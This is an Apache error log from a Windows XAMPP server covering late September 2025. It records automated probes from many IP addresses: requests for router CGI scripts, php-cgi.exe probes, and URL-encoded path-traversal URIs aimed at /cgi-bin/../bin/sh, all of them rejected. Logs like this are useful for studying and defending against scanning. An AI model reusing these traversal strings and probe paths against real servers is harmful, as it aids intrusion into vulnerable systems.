[Sun Sep 14 18:42:10.749056 2025] [cgi:error] [pid 2852:tid 1892] [client 121.167.125.180:48075] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Sep 14 18:42:10.920928 2025] [cgi:error] [pid 2852:tid 1892] [client 121.167.125.180:48202] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Sep 14 19:43:41.490534 2025] [cgi:error] [pid 2852:tid 1892] [client 121.185.148.144:34795] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sun Sep 14 19:43:41.771789 2025] [cgi:error] [pid 2852:tid 1892] [client 121.185.148.144:35251] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Mon Sep 15 11:17:10.998286 2025] [cgi:error] [pid 2852:tid 1864] [client 87.120.191.13:36252] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Mon Sep 15 15:46:22.020101 2025] [cgi:error] [pid 2852:tid 1900] [client 184.22.112.244:62625] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 16 11:30:47.462273 2025] [cgi:error] [pid 2852:tid 1884] [client 184.22.112.244:64166] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 16 15:07:54.014513 2025] [cgi:error] [pid 2852:tid 1892] [client 35.234.8.176:8160] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 16 15:08:00.442087 2025] [cgi:error] [pid 2852:tid 1892] [client 35.234.8.176:8161] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 16 15:20:03.002008 2025] [cgi:error] [pid 2852:tid 1892] [client 35.229.144.117:60864] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 16 22:24:26.650670 2025] [cgi:error] [pid 2852:tid 1908] [client 221.159.119.6:48063] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Sep 16 22:24:26.855364 2025] [cgi:error] [pid 2852:tid 1908] [client 221.159.119.6:48132] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Sep 16 23:42:46.394133 2025] [cgi:error] [pid 2852:tid 1908] [client 184.22.112.244:60964] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Wed Sep 17 00:57:42.537953 2025] [cgi:error] [pid 2852:tid 1908] [client 216.180.246.51:37396] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Wed Sep 17 05:52:58.626717 2025] [core:error] [pid 2852:tid 1908] [client 20.101.106.174:44576] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Wed Sep 17 06:45:47.954957 2025] [cgi:error] [pid 2852:tid 1884] [client 2.44.138.84:60907] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Wed Sep 17 15:12:56.815676 2025] [cgi:error] [pid 5144:tid 1872] [client 45.88.186.32:60634] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Wed Sep 17 15:12:57.003181 2025] [cgi:error] [pid 5144:tid 1860] [client 45.88.186.32:60660] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/shortcut_telnet.cgi
[Wed Sep 17 15:12:57.143797 2025] [cgi:error] [pid 5144:tid 1852] [client 45.88.186.32:60686] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cgi_main.cgi, referer: http://157.250.206.62/cfg_system_time.htm
[Wed Sep 17 15:12:57.206297 2025] [cgi:error] [pid 5144:tid 1852] [client 45.88.186.32:60692] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Wed Sep 17 15:12:57.409415 2025] [cgi:error] [pid 5144:tid 1884] [client 45.88.186.32:60720] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/system_mgr.cgi
[Wed Sep 17 15:12:57.471916 2025] [cgi:error] [pid 5144:tid 1884] [client 45.88.186.32:60732] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/account_mgr.cgi
[Wed Sep 17 15:12:57.675039 2025] [cgi:error] [pid 5144:tid 1852] [client 45.88.186.32:55556] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cstecgi.cgi, referer: http://157.250.206.62/advance/parental.html
[Wed Sep 17 15:12:57.878158 2025] [core:error] [pid 5144:tid 1852] [client 45.88.186.32:55588] AH10244: invalid URI path (/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh)
[Wed Sep 17 17:56:20.974902 2025] [cgi:error] [pid 5144:tid 1884] [client 45.156.129.168:34953] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Wed Sep 17 17:57:21.939262 2025] [cgi:error] [pid 5144:tid 1844] [client 45.156.129.168:59472] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Wed Sep 17 17:57:22.048632 2025] [cgi:error] [pid 5144:tid 1844] [client 45.156.129.168:59484] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Wed Sep 17 17:57:39.626484 2025] [core:error] [pid 5144:tid 1884] [client 45.156.129.169:60657] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Wed Sep 17 17:57:39.735846 2025] [core:error] [pid 5144:tid 1884] [client 45.156.129.169:38765] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Wed Sep 17 17:57:39.829598 2025] [core:error] [pid 5144:tid 1884] [client 45.156.129.168:59793] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Wed Sep 17 17:57:39.938968 2025] [cgi:error] [pid 5144:tid 1884] [client 45.156.129.169:56113] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Thu Sep 18 04:14:11.462996 2025] [core:error] [pid 5144:tid 1844] [client 47.250.113.137:46616] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Thu Sep 18 04:14:11.837985 2025] [core:error] [pid 5144:tid 1844] [client 47.250.113.137:46624] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Thu Sep 18 04:24:16.826348 2025] [cgi:error] [pid 5144:tid 1844] [client 35.229.224.2:7168] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Thu Sep 18 04:24:43.513372 2025] [cgi:error] [pid 5144:tid 1844] [client 35.229.224.2:7169] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Thu Sep 18 06:48:22.873141 2025] [core:error] [pid 5144:tid 1884] [client 113.45.143.70:44664] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Thu Sep 18 06:48:24.252907 2025] [core:error] [pid 5144:tid 1884] [client 113.45.143.70:44678] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Thu Sep 18 20:40:53.861735 2025] [cgi:error] [pid 7540:tid 1956] [client 221.159.119.6:43117] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Sep 18 20:40:54.049236 2025] [cgi:error] [pid 7540:tid 1956] [client 221.159.119.6:43163] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Sep 18 21:40:57.261911 2025] [cgi:error] [pid 7540:tid 1944] [client 45.88.186.32:35790] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Sep 18 21:40:57.449407 2025] [cgi:error] [pid 7540:tid 1920] [client 45.88.186.32:35814] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/shortcut_telnet.cgi
[Thu Sep 18 21:40:57.574408 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:35824] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cgi_main.cgi, referer: http://157.250.206.62/cfg_system_time.htm
[Thu Sep 18 21:40:57.652531 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:35830] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Thu Sep 18 21:40:57.855654 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:45952] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/system_mgr.cgi
[Thu Sep 18 21:40:57.918154 2025] [cgi:error] [pid 7540:tid 1944] [client 45.88.186.32:45966] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/account_mgr.cgi
[Thu Sep 18 21:40:58.121277 2025] [cgi:error] [pid 7540:tid 1920] [client 45.88.186.32:45992] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cstecgi.cgi, referer: http://157.250.206.62/advance/parental.html
[Thu Sep 18 21:40:58.308778 2025] [core:error] [pid 7540:tid 1920] [client 45.88.186.32:46018] AH10244: invalid URI path (/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh)
[Fri Sep 19 07:20:57.378356 2025] [core:error] [pid 7540:tid 1932] [client 38.211.193.130:51548] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Sep 19 07:20:57.818963 2025] [core:error] [pid 7540:tid 1932] [client 38.211.193.130:51562] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Fri Sep 19 08:11:04.045755 2025] [cgi:error] [pid 7540:tid 1932] [client 45.88.186.32:33552] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 08:11:04.233252 2025] [cgi:error] [pid 7540:tid 1932] [client 45.88.186.32:33568] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/shortcut_telnet.cgi
[Fri Sep 19 08:11:04.373875 2025] [cgi:error] [pid 7540:tid 1900] [client 45.88.186.32:33576] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cgi_main.cgi, referer: http://157.250.206.62/cfg_system_time.htm
[Fri Sep 19 08:11:04.436509 2025] [cgi:error] [pid 7540:tid 1900] [client 45.88.186.32:33578] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Fri Sep 19 08:11:04.639496 2025] [cgi:error] [pid 7540:tid 1900] [client 45.88.186.32:33608] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/system_mgr.cgi
[Fri Sep 19 08:11:04.701996 2025] [cgi:error] [pid 7540:tid 1932] [client 45.88.186.32:33610] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/account_mgr.cgi
[Fri Sep 19 08:11:04.905119 2025] [cgi:error] [pid 7540:tid 1900] [client 45.88.186.32:33650] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cstecgi.cgi, referer: http://157.250.206.62/advance/parental.html
[Fri Sep 19 08:11:05.092619 2025] [core:error] [pid 7540:tid 1900] [client 45.88.186.32:33672] AH10244: invalid URI path (/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh)
[Fri Sep 19 14:47:21.421468 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:58392] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 15:01:03.888389 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:56502] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 15:23:35.476559 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:35252] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 15:39:33.162632 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:55610] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 16:57:02.870899 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:54630] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 17:51:20.921309 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:41344] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 17:51:21.108808 2025] [cgi:error] [pid 7540:tid 1944] [client 45.88.186.32:41366] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/shortcut_telnet.cgi
[Fri Sep 19 17:51:21.233805 2025] [cgi:error] [pid 7540:tid 1896] [client 45.88.186.32:41388] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cgi_main.cgi, referer: http://157.250.206.62/cfg_system_time.htm
[Fri Sep 19 17:51:21.311929 2025] [cgi:error] [pid 7540:tid 1896] [client 45.88.186.32:41404] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Fri Sep 19 17:51:21.499428 2025] [cgi:error] [pid 7540:tid 1896] [client 45.88.186.32:41420] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/system_mgr.cgi
[Fri Sep 19 17:51:21.561926 2025] [cgi:error] [pid 7540:tid 1944] [client 45.88.186.32:41436] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/account_mgr.cgi
[Fri Sep 19 17:51:21.765052 2025] [cgi:error] [pid 7540:tid 1896] [client 45.88.186.32:41452] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/cstecgi.cgi, referer: http://157.250.206.62/advance/parental.html
[Fri Sep 19 17:51:21.952547 2025] [core:error] [pid 7540:tid 1896] [client 45.88.186.32:41464] AH10244: invalid URI path (/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh)
[Fri Sep 19 19:00:59.413759 2025] [cgi:error] [pid 7540:tid 1944] [client 216.180.246.136:58674] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Fri Sep 19 19:14:51.252223 2025] [cgi:error] [pid 7540:tid 1944] [client 204.76.203.10:45990] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 20:39:38.430763 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:59074] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 20:51:27.304532 2025] [authz_core:error] [pid 7540:tid 1932] [client 94.102.49.155:20034] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Fri Sep 19 20:51:31.481588 2025] [authz_core:error] [pid 7540:tid 1932] [client 94.102.49.155:61102] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Fri Sep 19 21:12:48.644594 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:42544] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 21:25:15.306480 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:43496] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 22:25:02.434750 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:44930] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 22:59:55.926927 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:54856] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Sep 19 23:51:50.354913 2025] [cgi:error] [pid 7540:tid 1932] [client 121.185.148.144:37529] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 01:37:26.140528 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:46352] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 02:26:22.568256 2025] [cgi:error] [pid 7540:tid 1896] [client 204.76.203.10:43278] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 02:42:56.870940 2025] [core:error] [pid 7540:tid 1932] (22)Invalid argument: [client 13.49.230.222:59619] AH00127: Cannot map POST /%C0 HTTP/1.1 to file
[Sat Sep 20 02:43:05.144264 2025] [core:error] [pid 7540:tid 1932] (22)Invalid argument: [client 13.49.230.222:60003] AH00127: Cannot map POST /%C0 HTTP/1.1 to file
[Sat Sep 20 02:46:22.203917 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:34538] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 03:19:18.749423 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:41650] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 03:47:28.398367 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:49612] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 06:13:27.367730 2025] [cgi:error] [pid 7540:tid 1900] [client 204.76.203.10:53170] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 06:42:38.464879 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:39408] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 07:27:16.666441 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:36776] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 08:13:13.972905 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:43756] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 08:26:45.019239 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:56056] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 08:59:54.877614 2025] [cgi:error] [pid 7540:tid 1932] [client 204.76.203.10:36746] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 18:42:49.606666 2025] [cgi:error] [pid 7540:tid 1896] [client 35.201.248.4:14912] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Sep 20 18:48:58.428139 2025] [cgi:error] [pid 7540:tid 1908] [client 221.159.119.6:55405] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 18:48:58.631247 2025] [cgi:error] [pid 7540:tid 1908] [client 221.159.119.6:55461] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Sat Sep 20 18:56:35.171861 2025] [cgi:error] [pid 7540:tid 1908] [client 35.194.237.234:2496] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Sep 20 18:56:56.767049 2025] [cgi:error] [pid 7540:tid 1908] [client 35.194.237.234:2497] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Sat Sep 20 23:44:23.743027 2025] [core:error] [pid 7540:tid 1896] [client 115.190.75.127:33856] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sat Sep 20 23:44:25.086760 2025] [core:error] [pid 7540:tid 1932] [client 115.190.75.127:45270] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sun Sep 21 05:45:09.015989 2025] [authz_core:error] [pid 7540:tid 1956] [client 176.32.195.85:59574] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Sun Sep 21 17:58:43.648259 2025] [core:error] [pid 7540:tid 1956] [client 120.48.140.213:49078] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon Sep 22 02:56:15.467151 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:41122] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/setup.cgi
[Mon Sep 22 06:03:53.979747 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:57702] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/telnet_config
[Mon Sep 22 07:00:57.455319 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:34004] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/resize_ext2
[Mon Sep 22 07:32:34.903583 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:58000] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/wlan_control
[Mon Sep 22 08:02:27.600395 2025] [cgi:error] [pid 7540:tid 1956] [client 45.88.186.32:40318] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/wlan_operate
[Mon Sep 22 09:15:52.696607 2025] [cgi:error] [pid 7540:tid 1956] [client 216.180.246.140:38204] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Mon Sep 22 10:38:24.191976 2025] [core:error] [pid 7540:tid 1900] (22)Invalid argument: [client 13.49.230.222:62218] AH00127: Cannot map POST /%C0 HTTP/1.1 to file
[Mon Sep 22 11:17:59.612169 2025] [authz_core:error] [pid 7540:tid 1896] [client 176.32.195.85:55880] AH01630: client denied by server configuration: C:/xampp/htdocs/uslwmcbil_api/public/server-status
[Mon Sep 22 17:24:34.000585 2025] [cgi:error] [pid 7540:tid 1900] [client 221.159.119.6:33627] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Mon Sep 22 17:24:34.172442 2025] [cgi:error] [pid 7540:tid 1900] [client 221.159.119.6:33690] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Sep 23 02:39:50.791424 2025] [core:error] [pid 7540:tid 1956] [client 111.250.120.136:50270] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue Sep 23 02:39:52.309653 2025] [core:error] [pid 7540:tid 1956] [client 111.250.120.136:50276] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Sep 23 03:49:32.248459 2025] [cgi:error] [pid 7540:tid 1896] [client 45.156.129.168:35929] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Tue Sep 23 03:51:00.915037 2025] [cgi:error] [pid 7540:tid 1896] [client 45.156.129.168:41630] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 23 03:51:01.040045 2025] [cgi:error] [pid 7540:tid 1896] [client 45.156.129.168:41646] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Tue Sep 23 03:51:29.215618 2025] [core:error] [pid 7540:tid 1932] [client 45.156.129.170:51305] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Tue Sep 23 03:51:29.324997 2025] [core:error] [pid 7540:tid 1932] [client 45.156.129.171:47177] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Tue Sep 23 03:51:29.418739 2025] [core:error] [pid 7540:tid 1932] [client 45.156.129.169:58515] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Tue Sep 23 03:51:33.950806 2025] [cgi:error] [pid 7540:tid 1900] [client 45.156.129.168:40111] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Tue Sep 23 07:00:57.720901 2025] [core:error] [pid 7540:tid 1900] [client 212.113.102.147:60994] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue Sep 23 07:01:01.139840 2025] [core:error] [pid 7540:tid 1900] [client 212.113.102.147:60996] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Sep 23 22:24:52.772046 2025] [authz_core:error] [pid 7540:tid 1956] [client 101.255.92.197:37138] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Wed Sep 24 01:05:12.611400 2025] [cgi:error] [pid 7540:tid 1932] [client 165.227.139.155:4594] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Wed Sep 24 02:48:23.333194 2025] [core:error] [pid 7540:tid 1932] [client 212.192.246.121:39608] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Wed Sep 24 02:48:24.739410 2025] [core:error] [pid 7540:tid 1932] [client 212.192.246.121:41482] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Wed Sep 24 15:03:59.417855 2025] [core:error] [pid 7540:tid 1848] [client 38.211.193.130:58648] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Wed Sep 24 15:03:59.808476 2025] [core:error] [pid 7540:tid 1848] [client 38.211.193.130:58654] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Wed Sep 24 15:28:27.834716 2025] [cgi:error] [pid 7540:tid 1848] [client 216.180.246.163:44814] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Wed Sep 24 15:39:59.706933 2025] [cgi:error] [pid 7540:tid 1848] [client 221.159.119.6:59701] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Wed Sep 24 15:39:59.910054 2025] [cgi:error] [pid 7540:tid 1848] [client 221.159.119.6:59763] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Thu Sep 25 06:40:27.969568 2025] [authz_core:error] [pid 7540:tid 1920] [client 45.135.193.254:60212] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/scripts
[Thu Sep 25 16:25:55.040695 2025] [cgi:error] [pid 5476:tid 1876] [client 45.156.129.166:53339] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/main.pl
[Thu Sep 25 16:26:06.401028 2025] [cgi:error] [pid 5476:tid 1884] [client 45.156.129.164:53005] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Thu Sep 25 16:26:13.201468 2025] [cgi:error] [pid 5476:tid 1884] [client 45.156.129.164:51652] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Thu Sep 25 16:26:13.326467 2025] [cgi:error] [pid 5476:tid 1884] [client 45.156.129.164:51662] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/php-cgi.exe
[Thu Sep 25 16:27:05.937352 2025] [core:error] [pid 5476:tid 1876] [client 45.156.129.165:34907] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Thu Sep 25 16:27:06.054766 2025] [core:error] [pid 5476:tid 1876] [client 45.156.129.165:50033] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Thu Sep 25 16:27:06.158148 2025] [core:error] [pid 5476:tid 1876] [client 45.156.129.167:39767] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Mon Sep 29 17:24:51.957089 2025] [cgi:error] [pid 8396:tid 1968] [client 184.22.114.14:56488] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Mon Sep 29 19:28:01.657991 2025] [cgi:error] [pid 7192:tid 2020] [client 216.180.246.124:50148] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Tue Sep 30 08:19:55.104389 2025] [cgi:error] [pid 7192:tid 1940] [client 35.236.153.253:1696] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 30 08:20:08.835303 2025] [cgi:error] [pid 7192:tid 1940] [client 35.236.153.253:1697] malformed header from script 'php-cgi.exe': Bad header: Security Alert! The PHP
[Tue Sep 30 21:59:36.604372 2025] [cgi:error] [pid 10280:tid 1984] [client 45.88.186.85:42092] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Tue Sep 30 21:59:37.044363 2025] [cgi:error] [pid 10280:tid 2000] [client 45.88.186.85:42154] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/server, referer: http://157.250.206.62:8080/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=
[Wed Oct 01 09:11:13.180326 2025] [cgi:error] [pid 10280:tid 1996] [client 45.88.186.85:40548] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
